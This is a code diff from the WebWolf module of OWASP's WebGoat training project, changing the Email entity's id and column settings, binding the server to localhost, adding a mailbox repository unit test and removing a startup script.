<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
</dependencies>
<build>

12
webwolf/src/main/java/org/owasp/webwolf/mailbox/Email.java
View File

@ -1,12 +1,9 @@
package org.owasp.webwolf.mailbox;
import lombok.AllArgsConstructor;
import lombok.Builder;
import lombok.Data;
import lombok.NoArgsConstructor;
import javax.persistence.Entity;
import javax.persistence.Id;
import javax.persistence.*;
import java.io.Serializable;
import java.time.LocalDateTime;
import java.time.format.DateTimeFormatter;
@ -15,16 +12,16 @@ import java.time.format.DateTimeFormatter;
* @author nbaars
* @since 8/20/17.
*/
@Builder
@Data
@Entity
@NoArgsConstructor
@AllArgsConstructor
public class Email implements Serializable {
@Id
private String id;
@GeneratedValue(strategy = GenerationType.IDENTITY)
private Long id;
private LocalDateTime time;
@Column(length = 1024)
private String contents;
private String sender;
private String title;
@ -45,4 +42,5 @@ public class Email implements Serializable {
public String getShortSender() {
return sender.substring(0, sender.indexOf("@"));
}
}

4
webwolf/src/main/resources/application.properties
View File

@ -3,6 +3,7 @@ server.error.path=/error.html
server.session.timeout=6000
#server.contextPath=/WebWolf
server.port=8081
server.address=127.0.0.1
server.session.cookie.name = WEBWOLFSESSION
spring.datasource.url=jdbc:hsqldb:file:${webgoat.server.directory}/data/webwolf
@ -29,7 +30,8 @@ multipart.location=${java.io.tmpdir}
multipart.max-file-size=1Mb
multipart.max-request-size=1Mb
webgoat.server.directory=${user.home}/.webgoat/
webgoat.build.version=@project.version@
webgoat.server.directory=${user.home}/.webgoat-${webgoat.build.version}/
webwolf.fileserver.location=${java.io.tmpdir}/webwolf-fileserver
spring.jackson.serialization.indent_output=true

49
webwolf/src/test/java/org/owasp/webwolf/mailbox/MailboxRepositoryTest.java Normal file
View File

@ -0,0 +1,49 @@
package org.owasp.webwolf.mailbox;
import org.hamcrest.CoreMatchers;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
import org.springframework.test.context.junit4.SpringRunner;
import java.time.LocalDateTime;
import java.util.List;
import static org.junit.Assert.*;
@DataJpaTest
@RunWith(SpringRunner.class)
public class MailboxRepositoryTest {
@Autowired
private MailboxRepository mailboxRepository;
@Test
public void emailShouldBeSaved() {
Email email = new Email();
email.setTime(LocalDateTime.now());
email.setTitle("test");
email.setSender("test@test.com");
email.setContents("test");
email.setRecipient("someone@webwolf.org");
mailboxRepository.save(email);
}
@Test
public void savedEmailShouldBeFoundByReceipient() {
Email email = new Email();
email.setTime(LocalDateTime.now());
email.setTitle("test");
email.setSender("test@test.com");
email.setContents("test");
email.setRecipient("someone@webwolf.org");
mailboxRepository.saveAndFlush(email);
List<Email> emails = mailboxRepository.findByRecipientOrderByTimeDesc("someone@webwolf.org");
assertThat(emails.size(), CoreMatchers.is(1));
}
}

3
webwolf/start.sh
View File

@ -1,3 +0,0 @@
#!/bin/sh
java -jar -Djava.security.egd=file:/dev/./urandom /home/webwolf/webwolf.jar